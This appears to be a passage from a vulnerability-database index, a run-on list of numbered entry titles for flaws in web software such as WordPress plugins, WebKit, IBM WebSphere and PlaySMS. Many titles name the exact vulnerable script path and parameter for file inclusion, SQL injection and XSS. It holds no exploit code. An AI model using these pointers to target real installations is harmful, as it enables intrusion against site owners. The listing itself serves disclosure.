Field XSS [75620] Zingiri Web Shop Plugin for WordPress wp-content/plugins/zingiri-web-shop/fws/ajax/init.inc.php wpabspath Parameter Remote File Inclusion [75619] Zingiri Web Shop Plugin for WordPress wp-content/plugins/zingiri-web-shop/fwkfor/ajax/init.inc wpabspath Parameter Remote File Inclusion [75615] AllWebMenus Plugin for WordPress wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php abspath Parameter Remote File Inclusion [75613] JBoss Multiple Product Web Services Native DTD Parsing Remote DoS [75587] Sap NetWeaver com.sap.ipc.webapp.ipcpricing Unspecified Remote Information Disclosure [75579] SAP NetWeaver Web Application Server SHORTCUT ICF Unspecified Remote Information Disclosure [75578] SAP NetWeaver Web Application Server WEBRFC ICF Unspecified XSS [75577] SAP NetWeaver Web Application Server (WebAS) cachetest ERP Unspecified Remote DoS [75576] IBM Lotus Domino WebAdmin.nsf PanelIcon Parameter fmpgPanelHeader ReadForm Action XSS [75574] Cogent DataHub Web Server Executable File Source Code Disclosure [75549] Google Chrome WebSockets Unspecified Remote DoS [75534] Trustwave WebDefend bgoperator Account Default Password [75533] Trustwave WebDefend vi Text Editor Privilege Escalation [75516] webSPELL Multiple Script Direct Request Path Disclosure [75514] WebsiteBaker admin/groups/add.php group_name Parameter SQL Injection [75513] WebsiteBaker admin/users/add.php Multiple Parameter SQL Injection [75512] WebsiteBaker Multiple /modules/ Script Path Disclosure [75507] WebCalendar colors.php color Parameter XSS [75506] WebCalendar login.php last_login Parameter XSS [75494] Progea Movicon / PowerHMI Content-Length HTTP Header Web Request Parsing Remote Overflow [75454] DivX Plus Web Player DivXPlaybackModule.dll file:// URL Handling Overflow [75444] Microsoft Windows WINS Loopback Interface Crafted Packet Local Privilege Escalation [75428] IBM WebSphere Commerce Web Service Activity Token Unspecified Issue [75360] Ripe Website Manager ripe/index.php v Parameter SQL Injection [75359] Ripe Website Manager ripe/modules/members/admin.php CSRF [75358] Ripe Website Manager ripe/modules/page/admin.php id Parameter SQL Injection [75353] Balitbang CMS FCKeditor /webtemp/functions/editor/filemanager/connectors/php/config.php Arbitrary File Upload [75340] Web Poll Pro poll/submit.php error Parameter XSS [75312] Trend Micro WebReputation API Bypass [75309] CMS WebManager-Pro index.php menu_id Parameter XSS [75304] PlaySMS SMS Gateway web/plugin/themes/work2/page_noaccess.php apps_path[themes] Parameter Remote File Inclusion [75303] PlaySMS SMS Gateway web/plugin/themes/work2/page_login.php apps_path[themes] Parameter Remote File Inclusion [75302] PlaySMS SMS Gateway web/plugin/themes/work2/page_forgot.php apps_path[themes] Parameter Remote File Inclusion [75301] PlaySMS SMS Gateway web/plugin/themes/km2/page_noaccess.php apps_path[themes] Parameter Remote File Inclusion [75300] PlaySMS SMS Gateway web/plugin/themes/default/page_register.php apps_path[themes] Parameter Remote File Inclusion [75299] PlaySMS SMS Gateway web/plugin/themes/default/page_noaccess.php apps_path[themes] Parameter Remote File Inclusion [75298] PlaySMS SMS Gateway web/plugin/themes/default/page_login.php apps_path[themes] Parameter Remote File Inclusion [75297] PlaySMS SMS Gateway web/plugin/themes/default/page_forgot.php apps_path[themes] Parameter Remote File Inclusion [75255] WebKit Cross-Origin Drag-and-Drop Frame Handling Information Disclosure Weakness [75254] WebKit Attr.style Accessor Parsing Same Origin Policy Bypass Universal XSS [75253] WebKit HTTP Basic Authentication Authorization HTTP Header Logging Remote Credential Disclosure [75237] babelweb Supplementary Group Dropping Local Privilege Escalation [75221] PlaySMS SMS Gateway web/plugin/themes/work2/page_register.php apps_path[themes] Parameter Remote File Inclusion [75207] WebsiteBaker Unspecified XSS [75189] Multiple Router Embedded Web Server DSL Password Input Field Source Code Password Disclosure [75135] Martinweb CMS index.php pages Parameter SQL DB Structure Disclosure [75134] Martinweb CMS index.php Multiple Parameter XSS [75133] Martinweb CMS sitesearch XSS [75087] TP-LINK TL-WR740N WebConsole / UPnP Services Packet Saturation Remote DoS [75054] Unidesk /Uni.Web/Reporting/Default.aspx ReportingService Session Credential Verification Weakness Remote Information Disclosure [75036] Advantech/Broadwin WebAccess Unspecified Filter Bypass SQL Injection [75035] Advantech/Broadwin WebAccess Unspecified Remote DoS [75034] Advantech/Broadwin WebAccess Multiple ActiveX Unspecified Issues [75013] WebKit Cached Resources Cache Poisoning Remote DoS [74999] Babylon Web Site Translation XSS [74970] CA Total Defense Heartbeat Web Service FileUploadHandler.ashx GUID Parameter Traversal Arbitrary File Upload [74967] CA Total Defense Web Management Service management.asmx Module getDBConfigSettings() Method Remote Server Database Credentials Disclosure [74965] Symantec PGP Universal Web Messenger lnj.e retryURL Parameter Arbitrary Site Redirect [74914] ACTi Multiple Products Web Configurator cgi-bin/test iperf Parameter Remote Command Injection [74898] Advantech/Broadwin WebAccess Client ActiveX (bwocxrun.ocx) Multiple Method fpt Parameter Memory Corruption [74897] Advantech/Broadwin WebAccess Client ActiveX (bwocxrun.ocx) OcxSpool() Method Format String [74867] InduSoft Web Studio ISSymbol ActiveX (ISSymbol.ocx) Multiple Method Overflow [74842] WebKit counterToCSSValue NULL Pointer Dereference DoS Weakness [74830] IBM WebSphere Application Server (WAS) Community Edition Tomcat Webdav Servlet Unspecified Issue [74828] Opera Web Content Security Display Weakness [74817] IBM WebSphere Application Server (WAS) Administration Console Unspecified Traversal Arbitrary File Access [74815] babelweb user Option Local Privilege Escalation [74795] RT Search Interface Encrypted Password Disclosure [74790] Newscoop Admin Interface Template Manipulation Arbitrary File Access [74789] Newscoop Admin Interface Campsite edit_template.php Path Parameter Arbitrary File Disclosure [74788] Newscoop Admin Interface Unspecified Local File Execution [74786] Newscoop Admin Interface Unspecified Issue [74779] Cisco Multiple Products Open Query Interface Remote Information Disclosure [74773] IBM Web Application Firewall Query String Parameter Substring Remote Intrusion Prevention Bypass [74756] icedtea-web Java Web Start Security Warning Dialog Manipulation Weakness [74676] Linux Kernel /proc/PID/io Interface Cross Session User Information Disclosure [74592] Mozilla Multiple Products WebGL Unspecified DoS [74591] Mozilla Multiple Products WebGL Shader Compiler ShaderSource Method Overflow [74590] Mozilla Multiple Products WebGL Almost Native Graphics Layer Engine (ANGLE) Shader Pre-Processor Overflow [74567] Roundcube Webmail Multiple Unspecified Script _mbox Parameter XSS [74523] Novell Data Synchronizer Mobility Pack WebAdmin Weak SSL Cipher Support Brute Force Weakness [74520] Novell Data Synchronizer Mobility Pack WebAdmin Unspecified Session Fixation [74519] Novell Data Synchronizer Mobility Pack WebAdmin Remote Authentication Bypass GroupWise Information Disclosure [74511] IBM WebSphere Service Registry and Repository (WSRR) agentDetect.jsp User-Agent HTTP Header XSS [74412] HP WebOS Contacts Application Unspecified XSS [74411] HP WebOS Calendar Application Unspecified XSS [74406] Microsoft Windows Remote Desktop Web Access Logon Page Unspecified XSS [74380] Google Chrome WebGL Fragment Shader Arbitrary Cross-domain Image Disclosure [74357] CA SiteMinder Web Agents Multi-line Header Injection Spoofing Remote Privilege Escalation [74344] CA Output Management Web Viewer PPSViewer ActiveX (PPSView.ocx) SRC Parameter Overflow [74343] CA Output Management Web Viewer UOMWV_Helper ActiveX (UOMWV_HelperActiveX.ocx) Title Property Overflow [74342] Webmin useradmin/user-lib.pl chfn Command Full Name Field XSS [74335] Hitachi Web Server TLS Renegotiation Handshakes MiTM Plaintext Data Injection [74318] Trend Micro Control Manager WebApp/widget/proxy_request.php module Parameter Traversal Arbitrary File Access [74309] Mongoose mongoose.c put_dir() Function HTTP PUT Web Request Parsing Overflow [74280] iWebkit Theme for Drupal Menu Links XSS [74238] WebKit Web Inspector Object Tree Serialization Unspecified Overflow [74162] CA ARCserve D2D homepageServlet Google Web Toolkit (GWT) RPC Request Parsing Admin Credential Disclosure [74149] MinaliC Web Request %20 Character Parsing Remote Source Code Disclosure [74097] OTRS (Open Ticket Request System) Rich-text-editor Component Customer Interface Source Code Feature XSS [74096] OTRS (Open Ticket Request System) Customer Interface Ticket-print Dialog Multiple Field Remote Information Disclosure [74072] Samba Web Administration Tool (SWAT) Change Password Page user Field XSS [74071] Samba Web Administration Tool (SWAT) Multiple Function CSRF [74049] Recipes website Script Silver Edition viewRecipe.php recipeId Parameter SQL Injection [74025] OTRS (Open Ticket Request System) CustomerInterface Component Unspecified Remote Access Restriction Bypass [74023] OTRS (Open Ticket Request System) Kernel/System/Web/Request.pm Directory Permissions Weakness Local Access Restriction Bypass [74021] WebKit HistoryController Form Resubmission Use-after-free Issue [74019] WebKit parseURL CSS Parser URL Handling Arbitrary File Disclosure [74018] WebKit Cross-origin Username URL Handling XSS [74016] WebKit Table Caption Layout Handling Use-after-free Arbitrary Code Execution [74015] WebKit isDeletableElement Use-after-free Arbitrary Code Execution [74014] WebKit Geolocation Permission Response Page Close Handling Use-after-free Issue [74013] WebKit SVG Marker Update Handling Use-after-free Issue [74012] WebKit SVGTextRunWalker::walk svg/SVGFont.cpp Buffer Overflow [74011] WebKit Unspecified Memory Corruption (2011-0255) [74010] WebKit Unspecified Memory Corruption (2011-0254) [74009] WebKit Unspecified Memory Corruption (2011-0253) [74008] WebKit SVG Tags animVal Property Handling Use-after-free Arbitrary Code Execution [74007] WebKit Unspecified Memory Corruption (2011-0238) [74006] WebKit Unspecified Memory Corruption (2011-0237) [74005] WebKit Unspecified Memory Corruption (2011-0235) [74004] WebKit Detached Body Element Handling Use-after-free Arbitrary Code Execution [74003] WebKit Unspecified Memory Corruption (2011-0233) [74002] WebKit Unspecified Memory Corruption (2011-0232) [74001] WebKit Unspecified Memory Corruption (2011-0225) [74000] WebKit Frameset Element Style Attribute Handling Buffer Overflow [73999] WebKit Unspecified Memory Corruption (2011-0222) [73998] WebKit Unspecified Memory Corruption (2011-0221) [73997] WebKit Unspecified Memory Corruption (2011-0218) [73995] Apple Safari AutoFill Web Forms Address Book Information Disclosure [73993] WebKit TIFF Image Handling Use-after-free Arbitrary Code Execution [73979] AR Web Content Manager (AWCM) header.php Multiple Cookie Traversal Arbitrary File Access [73978] AR Web Content Manager (AWCM) index.php Multiple Cookie Traversal Arbitrary File Access [73903] IBM WebSphere Application Server (WAS) logoutExitPage Parameter Arbitrary Site Redirect [73898] IBM WebSphere Application Server (WAS) Administration Console Request Local Stack Trace Information Disclosure [73886] Auto Web Toolbox details.php id Parameter SQL Injection [73885] OTRS (Open Ticket Request System) iPhoneHandle Package Interface Unspecified Remote Privilege Escalation [73883] IBM Tivoli Directory Server Web Administration Tool IDSWebApp Authentication Field Autocomplete Remote Access Bypass [73871] Roundcube Webmail Login Form Email Message Composition Remote Information Disclosure [73870] Roundcube Webmail steps/utils/modcss.inc External CSS Request Remote Information Disclosure [73865] MediaCAST New Atlanta BlueDragon Admin Interface External TCP Connection Unspecified Remote Issue [73864] MediaCAST New Atlanta BlueDragon Admin Interface Multiple Unspecified XSS [73862] IBM Rational DOORS Web Access Login Component New User Account License Consumption Remote DoS [73840] Opera Web Workers Application Crash DoS [73809] Hitachi JP1/Performance Management Web Console Unspecified XSS [73801] ANGLE WebGLES Graphics Library AddString Shader Loading Overflow [73774] WebKit Web Inspector window.console._inspectorCommandLineAPI Same Origin Policy Bypass XSS [73773] WebKit Windows Functionality Same Origin Policy Bypass Arbitrary File Disclosure [73771] WebKit WebGL Stencil Buffers Initialization Arbitrary Video Memory Read Issue [73765] OpenJDK Runtime Environment IcedTea-Web JNLPClassLoader Multiple Signer Remote Privilege Escalation [73762] AR Web Content Manager (AWCM) control/common.php lang_file Parameter Remote File Inclusion [73761] AR Web Content Manager (AWCM) header.php theme_file Parameter Remote File Inclusion [73760] AR Web Content Manager (AWCM) includes/window_top.php theme_file Parameter Remote File Inclusion [73758] Webmatic index.php p Parameter SQL Injection [73732] WeBid USERLANGUAGE Cookie Traversal Local File Inclusion [73727] RealityServer Web Services RTMP Server NULL Pointer Remote DoS [73720] web.go get_secure_cookie Cookie Timestamp Validation Weakness [73704] IBM WebSphere MQ CDP Certificate Extension Revoked Certificate MiTM SSL Partner Spoofing Weakness [73696] m0n0wall WebGUI Password Plaintext Local Disclosure [73664] LuxCal Web Calendar index.php id Parameter SQL Injection [73658] Symantec Web Gateway forget.php username Parameter SQL Injection [73630] F5 BIG-IP ASM Web Scraping Unspecified XSS [73610] WeBid index.php lan Parameter Traversal Local File Inclusion [73609] WeBid converter.php Multiple Parameter Remote PHP Code Injection [73608] WeBid Multiple Script WEBID_ONLINE Cookie SQL Injection [73607] WeBid logout.php WEBID_RM_ID Cookie SQL Injection [73606] WeBid feedback.php auction_id Parameter SQL Injection [73601] WebDefend Enterprise Application Server Hardcoded Console Credentials Security Event Data Remote Disclosure [73592] HP WebOS Contacts Application Imported Contact Multiple Field XSS [73584] WHMCompleteSolution (WHMCS) weblink_cat_list.php bcat_id Parameter SQL Injection [73549] IBM Rational DOORS Web Access Unspecified Issue [73548] IBM Rational DOORS Web Access Server Error Response Unspecified Issue [73547] IBM Rational DOORS Web Access Unspecified XSS [73546] IBM Tivoli Directory Server Web Administration Tool IDSWebApp Log File Information Disclosure [73511] WebKit SVG Use Element Shadow Building Document Children Removal Use-after-free [73510] WebKit HTML Parser ContainerNode::parserAddChild Use-after-free [73483] NetServe Web Server Multiple Unspecified Remote DoS [73482] NetServe Web Server Multiple Unspecified Local File Inclusion [73481] NetServe Web Server Multiple Unspecified Remote File Inclusion [73480] NetServe Web Server admin/mimetypes.html Multiple Parameter XSS [73479] NetServe Web Server admin/host_0/ssioptions.html Multiple Parameter XSS [73468] WebDefend Enterprise Management Port Default Account Credentials Event Collection Table Remote Disclosure [73434] Asterisk Multiple Products Manager Interface manager.c Originate Action Remote Command Execution [73427] BlackBerry Enterprise Server Multiple Products Web Desktop Manager webdesktop/app displayErrorMessage Parameter XSS [73413] InduSoft Web Studio NTWebServer Traversal Arbitrary Code Execution [73386] IBM WebSphere Application Server (WAS) Web Services SAAJ Encrypted SOAP Message Remote DoS [73385] IBM WebSphere Application Server (WAS) Security Component AuthCache Purge PlatformCredential Cache Remote Privilege Escalation [73381] IBM WebSphere Application Server (WAS) Security Component TIP/eWAS Framework AuthCache Entry Remote Access Bypass [73380] Microsoft Lync Web Components Server Reach/Client/WebPages/ReachJoin.aspx reachLocale Parameter XSS [73379] IBM WebSphere Application Server (WAS) Security Component LTPA Token Memory Consumption Remote DoS [73378] IBM WebSphere Application Server (WAS) JavaServer Pages org.apache.jasper.runtime.JspWriterImpl.response JSP Page Application Restart Remote DoS [73355] IBM WebSphere Application Server (WAS) JavaServer Pages com.ibm.ws.jsp.runtime.WASJSPStrBufferImpl JSP Request Memory Leak Remote DoS [73354] IBM WebSphere Application Server (WAS) HTTP Transport SIP Proxy UDP Message Saturation Remote DoS [73353] IBM WebSphere Application Server (WAS) Messaging Engine JMS Receive Call NULL Return Memory Leak Remote DoS [73352] IBM WebSphere Application Server (WAS) Service Integration Bus (SIB) Messaging Engine Queue Manager Close Operation Remote DoS [73350] IBM WebSphere Application Server (WAS) IIOP Request Rejection Double-free Remote DoS [73349] IBM WebSphere Application Server (WAS) Administrative Console Primary admin ID Mapping Access Restriction Bypass [73348] IBM WebSphere Application Server (WAS) Security Component ibm-application-bnd.xml Security Role Mapping Remote Privilege Escalation [73347] IBM WebSphere Application Server (WAS) Administrative Scripting Tools Multiple Log Files wsadmin Command Local Information Disclosure [73346] IBM WebSphere Application Server (WAS) HTTP Server Plugin Trace Request XSS [73341] IBM WebSphere Application Server (WAS) Installer Temporary Log Directory Permissions Weakness Local File Access [73338] Cisco Secure Desktop (CSD) CSDWebInstaller.ocx ActiveX inst.exe Program Name Remote Program Execution [73337] Cisco Secure Desktop (CSD) CSDWebInstaller.ocx ActiveX Installation Process Signature Verification Weakness Arbitrary Code Execution [73302] LMS Web Ensino index.php Multiple Parameter XSS [73301] LMS Web Ensino index.php codBibliotecaCategoria Parameter SQL Injection [73300] LMS Web Ensino User Password Change CSRF [73299] LMS Web Ensino Cookie Re-use Session Fixation [73289] IBM WebSphere Application Server (WAS) WS-Security XML Encryption Algorithm Weakness Plaintext Data Disclosure [73284] CMS WebManager-Pro /admin Login Field SQL Injection [73283] CMS WebManager-Pro index.php word Parameter XSS [73282] CMS WebManager-Pro edit_content.php Arbitrary Page Edit CSRF [73281] CMS WebManager-Pro Multiple Page Text Field Arbitrary PHP Code Execution [73266] MidiCMS Website Builder admin/jscripts/tiny_mce/plugins/ezfilemanager/index.php Arbitrary File Upload [73265] MidiCMS Website Builder Page Deletion CSRF [73231] IBM Datacap Taskmaster Capture Web Client Service Cleartext Password Weakness [73227] IBM Web Content Manager (WCM) Authoring Tool Draft Creation Remote Access Restriction Bypass [73226] IBM Web Content Manager (WCM) StackOverflowError Exception Race Condition Remote DoS [73225] IBM WebSphere Portal OutputMediator Object Request Remote DoS [73210] HP Web Jetadmin Unspecified Local Access Restriction Bypass [73202] WeblyGo Unspecified XSS [73199] CIDWeb CidWebPwd/errpage.asp Multiple Parameter XSS [73191] Mozilla Multiple Products WebGL Invalid Write Remote Code Execution [73190] Mozilla Multiple Products WebGL Out-of-bounds Read GPU Processes Information Disclosure [73189] Mozilla Multiple Products WebGL Texture Image Rendering Cross-domain Image Data Disclosure [73160] HP Photosmart Multiple Products Embedded Web Server SNMP Remote Information Disclosure [73159] HP Photosmart Multiple Products Embedded Web Server Webscan Scan Surface Remote Document Access [73149] AR Web Content Manager (AWCM) search.php search Parameter XSS [73145] openSUSE Build Service (OBS) webui Component Login Page XSS [73124] Sunway ForceControl Web Server (httpsvr.exe) URI Handling Remote Overflow [73114] Hitachi Web Server Directory Indexes DoS [73110] WeBid adsearch.php maxprice Parameter SQL Injection [73101] Mozilla Firefox WebGL Graphics Memory Information Disclosure [73080] Oracle Java SE / JRE Java Web Start DLL Search Path Subversion Arbitrary DLL Injection Code Execution [73079] Oracle Java SE / JRE Java Web Start File Search Path Policy File Loading Remote Code Execution [73078] Oracle Java SE / JRE Java Web Start File Search Path Settings Files Loading Remote Code Execution [73073] Oracle Java SE / JRE jnlp File Properties Handling Web Start Command Argument Injection Remote Code Execution [73052] IBM WebSphere Application Server (WAS) Admin Security Disable CSRF [73035] GNOME Display Manager (gdm) glib2 Web Browser x-scheme-handler/http MIME Type Local Privilege Escalation [72983] TinyWebGallery /admin/index.php item Parameter Traversal Arbitrary File Access [72970] WebSVN dl.php path Parameter Shell Command Injection [72966] OTRS (Open Ticket Request System) webscript.pl Remote Command Execution [72940] Libvoikko Python / Java Interface NULL Character Handling DoS [72937] Microsoft Windows Active Directory Certificate Services Web Enrollment XSS [72914] HotWeb Rentals resorts.asp PropResort Parameter SQL Injection [72912] IBM WebSphere Application Server (WAS) JAAS Login Null Password Hashtable Login Authentication Bypass [72889] WellinTech KingView ActiveX (KVWebSvr.dll) ValidateUser Method Overflow [72871] Siemens SIMATIC S7-1200 CPU Web Server Network Request Saturation Remote DoS [72869] Advantech/Broadwin WebAccess webvrpcs.exe Service Remote Code Execution [72867] Advantech/Broadwin WebAccess bwocxrun.ocx ActiveX Arbitrary Code Execution [72863] Simple web-server URI Traversal Arbitrary File Access [72811] CodeMeter WebAdmin Licenses.html BoxSerial Parameter XSS [72808] Seo Panel websites.php url Parameter SQL Injection [72780] WebKit CSS Visited Link Style History Information Disclosure [72740] AIDeX Mini-WebServer chat/post.html nick Parameter XSS [72731] Kentico CMS examples/webparts/membership/users-viewer.aspx userContextMenu_parameter Parameter XSS [72699] IBM WebSphere Application Server (WAS) Admin Console /ibm/console/jvmLogDetail.do runtimeErrFileName Parameter Arbitrary File Access [72693] Cherokee Admin Interface Arbitrary Command Execution CSRF [72690] Webkit RenderLineBoxList::dirtyLinesFromChangedChild Use-after-free Arbitrary Code Execution [72669] web@all dat/cache_tpl/web/_msg.htm.php Multiple Page XSS [72668] web@all dat/cache_tpl/web/search.htm.php (search.php) _sv Parameter XSS [72667] web@all mem/action.php filename Parameter SQL Injection [72658] IB Promotion Advanced Business Web Suite Search Facility qs Parameter XSS [72607] Cisco TelePresence Recording Server XML-RPC Interface Unspecified Unauthenticated Command Execution [72603] Cisco TelePresence Java Servlet RMI Interface Multiple Crafted Requests Remote DoS [72596] Cisco TelePresence Java RMI Interface Unspecified Remote Command Injection [72504] WebKit RenderBox::removeFloatingOrPositionedChildFromBlockLists Floats Rendering Use-after-free Issue [72500] IBM WebSphere Portal Search Center Unspecified XSS [72489] WebKit WebGL Rendering Context Removal Use-after-free Remote Code Execution [72487] WebKit V8DataView::constructorCallback DataView Object Handling Remote Code Execution [72478] WebKit Web Workers Cross-Origin Error Message Leak Same Origin Policy Bypass [72476] WebKit Elements Referencing Counter Nodes Cloning Use-after-free [72463] SecureSphere Web Application Firewall String Concatenation SQL Injection Filter Bypass [72460] Mozilla Multiple Products Web Workers Garbage Collection Use-after-free Remote Code Execution [72436] SMC / Comcast DOCSIS Business Gateways Web Management Portal Session Generation Weakness [72433] Cisco WebEx Meeting Center ATP File Handling Overflow [72432] Cisco WebEx WRF File Handling Overflow [72430] Mitel Audio and Web Conferencing wd/applets/Error.asp type Parameter XSS [72429] Mitel Audio and Web Conferencing wd/connect.asp Multiple Parameter XSS [72428] Mitel Audio and Web Conferencing wd/wdinvite.asp SID Parameter XSS [72409] Webform Module for Drupal Webform File Upload Filename XSS [72408] Webform Module for Drupal New Webform Field name Parameter XSS [72400] TWiki bin/login/Sandbox/WebHome origurl Parameter XSS [72370] WebKit SVG Filters Transforms Handling Multiple Integer Overflows [72369] WebKit SVG Image Media Type Bad Cast Memory Corruption [72319] HP Palm WebOS Plug-in Development Kit Unspecified Arbitrary File Overwrite [72318] HP Palm WebOS Email Unspecified XSS [72314] IBM Datacap Taskmaster Capture TMWeb Unspecified SQL Injection [72300] IBM WebSphere Application Server for z/OS Permissions Weakness Access Restriction Bypass [72298] Edraw Office Viewer Component ActiveX HttpPost() Method WebUrl Parameter Overflow [72295] IBM WebSphere DataPower XC10 Appliance Unspecified Java Issue [72283] WebKit Key Frame Rule Stylesheet Removal Use-after-free [72282] WebKit Forms Control Handling Use-after-free [72279] WebKit 'RenderTable::addChild' Table Handling Use-after-free [72278] WebKit 'RenderTable::firstLineBoxBaseline' Table Rendering Use-after-free [72273] Google Chrome WebGL drawElements Arbitrary Memory Read Issue [72271] Google Chrome WebGL Out-of-bounds Read Unspecified DoS (2011-1122) [72262] WebKit SVG Text Handling 'insertedIntoDocument' Stale Pointer [72216] WebKit Non-styled Element Removal ID Mapping Use-after-free [72214] Google Chrome WebSockets Use-after-free Unspecified DoS [72207] WebKit Node Removal Custom Event Handlers DOM Tree Corruption [72206] WebKit Floating Select Lists Casting Memory Corruption [72196] WebKit Floating Object Handling Stale Pointer Issue [72171] Cisco Linksys BEFSR41 Admin Interface Multiple Fields XSS [72166] Proofpoint Protection Server User Mail Filter Interface Authentication Bypass [72135] ICONICS WebHMI VersionInfo ActiveX (GenVersion.dll) SetActiveXGUID() Method Ax_GUID Parameter Overflow [72131] IceWarp Server webmail/index.html Multiple Parameter XSS [72125] CA Arcot WebFort Versatile Authentication Server Unspecified Arbitrary Site Redirect [72124] CA Arcot WebFort Versatile Authentication Server Unspecified XSS [72111] 360 Web Manager adm/barra/assetmanager/assetmanager.php Unspecified Parameter Traversal Arbitrary File Manipulation [72110] 360 Web Manager adm/barra/assetmanager/assetmanager.php Arbitrary File Upload [72109] 360 Web Manager adm/barra/assetmanager/assetmanager.php HTML Source Installation Path Disclosure [72093] ANGLE WebGLES Graphics Library Program::getActiveUniformMaxLength Off-by-three Overflow [72091] Mozilla Firefox for Windows WebGLES Library Missing ASLR Protection Weakness [72048] webERP AccountGroups.php CompanyNameField Parameter XSS [71991] webSPELL admin/admincenter.php Multiple Parameter XSS [71990] webSPELL index.php Multiple Parameter XSS [71968] web2Project calendar.php token Parameter SQL Injection [71961] Oracle Fusion Middleware Oracle WebLogic Server TLS Renegotiation Handshakes MiTM Plaintext Data Injection [71944] Oracle Sun Java System Access Manager Policy Agent Web Proxy Agent Unspecified Remote DoS [71934] Oracle E-Business Suite Web ADI Unspecified Remote Issue [71917] Oracle JD Edwards EnterpriseOne Tools Web Runtime SEC /jde/JASMafletMafBrowserClose.mafService jdemafjasLinkTarget Parameter XSS [71916] Oracle JD Edwards EnterpriseOne Tools Web Runtime SEC /jde/MafletClose.mafService RENDER_MAFLET Parameter XSS [71915] Oracle JD Edwards EnterpriseOne Tools Web Runtime SEC /jde/E1Menu_OCL.mafService e1.namespace Parameter XSS [71914] Oracle JD Edwards EnterpriseOne Tools Web Runtime SEC /jde/E1Menu_Menu.mafService e1.namespace Parameter XSS [71913] Oracle JD Edwards EnterpriseOne Tools Web Runtime SEC /jde/E1Menu.maf jdeowpBackButtonProtect Parameter XSS [71865] Ripe Website Manager ripe/modules/nav/admin.php menu_id Parameter XSS [71844] WebJaxe php/partie_administrateur/administration.php Admin Password Manipulation CSRF [71839] Webform Block Module for Drupal Webform Block Title Unspecified XSS [71833] SAP NetWeaver Web Application Server ITS Mobile Start / ITS Mobile Test Services Unspecified XSS [71832] SAP NetWeaver Web Application Server Unspecified Arbitrary Site Redirect [71827] FiberHome HG-110 Router cgi-bin/webproc getpage Parameter Traversal Arbitrary File Access [71826] FiberHome HG-110 Router cgi-bin/webproc getpage Parameter XSS [71810] QianBo Enterprise Web Site Management System Search.Asp Keyword Parameter XSS [71607] Oracle Java SE / Java for Business Deployment Java Webstart JNLP Extension Permission Handling Remote Code Execution [71596] QTweb for Windows CSS Handling DoS [71586] Easy File Sharing Web Server UserID Cookie Authentication Bypass [71565] Privileged Identity Management (PIM) Suite Password Vault Web Access Unspecified XSS [71547] WebKit Unspecified Memory Corruption (2011-0134) [71542] WebKit Unspecified Memory Corruption (2011-0139) [71541] WebKit CSSStyleSheet / CSSRuleList CSS Rule Deletion Use-after-free [71539] WebKit RenderTextControlSingleLine::adjustControlHeightBasedOnLineHeight Bad Cast Memory Corruption [71537] WebKit 'ReplaceSelectionCommand::doApply' Selection Modification Use-after-free [71536] WebKit RenderBox::removeFloatingOrPositionedChildFromBlockLists Use-after-free Arbitrary Code Execution [71535] WebKit Leaf Inline Box Selection State Bad Cast Memory Corruption [71534] WebKit Large SVG Elements Handling Numeric Overflow Issue [71533] WebKit CSS Stylesheets Lacking Wrappers Detached Subtrees Handling Use-after-free Issue [71532] WebKit Render View Child Addition Memory Corruption [71530] WebKit Node With Parent In Document Removal Memory Corruption [71529] WebKit selectedStylesheetSet Property Handling Memory Corruption [71528] WebKit DOMWindow::scrollTo Scroll Event Scrollbar Deletion Handling Use-after-free Issue [71527] WebKit JavaScript 'sort()' Method Memory Corruption [71525] WebKit RenderObjectChildList::updateBeforeAfterContent Content Updating Memory Corruption [71524] WebKit Unspecified Memory Corruption (2011-0164) [71517] WebKit SVG font-face-name Element Missing name Attribute Handling Memory Corruption [71516] WebKit getTimingFunctionValue CSS Handling Use-after-free Issue [71515] WebKit Nested first-letter Pseudo Element Non-layout Style Change Handling Memory Corruption [71514] WebKit Range Content Processing DOM Tree Mutation Use-after-free [71513] WebKit htmlelement Library setOuterText Method Handling Use-after-free Issue [71512] WebKit Bad Typecasting Event Handling Memory Corruption [71511] WebKit RenderLayerBacking::startAnimation Bad Typecasting Memory Corruption [71510] WebKit CSSStyleSelector Code Various CSSValue Bad Casts Memory Corruption [71509] WebKit Counter Node Handling Use-after-free Arbitrary Code Execution [71508] WebKit Legend Element Float Addition Handling Use-after-free Arbitrary Code Execution [71506] WebKit Text Drawing During Custom Font Loading Memory Corruption [71504] WebKit Custom Font Handling Error Image Incorrect Size Memory Corruption [71503] WebKit stringToLengthType Invalid Length Unit Parsing Out-of-bounds Read Issue [71502] WebKit EventSource::endRequest EventSource Status Error Handling Use-after-free Issue [71501] WebKit Accessibility Notification Sending Style Computation Use-after-free Issue [71499] WebKit mousedown Event Type MouseEvent Bad Cast Memory Corruption [71498] WebKit Unspecified Memory Corruption (2011-0130) [71496] WebKit Run-in Box Promotion Use-after-free Issue [71495] WebKit 'before' Child Adding Anonymous Table Part Use-after-free [71490] WebCalendar edit_entry_handler.php Multiple Parameter XSS [71468] IBM WEBi Unspecified XSS [71467] IBM WEBi Unspecified Issue [71456] IBM WebSphere Application Server (WAS) IVT Unspecified XSS [71333] Webmedia Explorer /folder desc Parameter XSS [71317] Zomplog /admin/settings.php weblog_subtitle Parameter XSS [71313] PyroCMS index.php website Parameter XSS [71311] wodWebServer.NET URL Traversal Arbitrary File Access [71263] phpWebSite javascript/editors/fckeditor/editor/custom.php local Parameter XSS [71252] IBM Tivoli Netcool/OMNIbus Web GUI Unspecified SQL Injection [71182] WebKit Style Element Handling Integer Overflow Code Execution [71178] TIBCO tibbr Web Server Unspecified XSS [71164] SSWebPlus CMS info_view.php idx Parameter SQL Injection [71118] F-Secure Policy Manager Web Reporting Module Invalid Report Access Path Disclosure [71117] F-Secure Policy Manager Web Reporting Module Unspecified XSS [71108] IBM Lotus Sametime stconf.nsf/WebMessage messageString Parameter XSS [71040] Citrix XenApp / XenDesktop Unspecified XML Service Interface Remote Code Execution [71037] DIY Web CMS login.php msg Parameter XSS [71036] DIY Web CMS Catalog.asp Multiple Parameter SQL Injection [71035] DIY Web CMS template.asp menuid Parameter SQL Injection [71034] DIY Web CMS viewcatalog.asp id Parameter SQL Injection [71033] Maian Weblog index.php post Parameter SQL Injection [70990] WebKit Image Loading Failed Load Object Fallback Content Use-after-free Issue [70977] WebKit AnimationControllerPrivate::fireEventsAndUpdateStyle Animation Event Processing Stale Pointer [70975] WebAsyst index.php app Parameter XSS [70974] WebAsyst SC/html/scripts/index.php Multiple Parameter XSS [70972] PIPI Player PIPIWebPlayer ActiveX (PIWebPlayer.ocx) Multiple Method Overflow [70947] PyWebDAV DAVServer/mysqlauth.py get_userinfo() Multiple Parameter SQL Injection [70929] Seo Panel reports.php website_id Parameter SQL Injection [70884] Cisco Security Agent 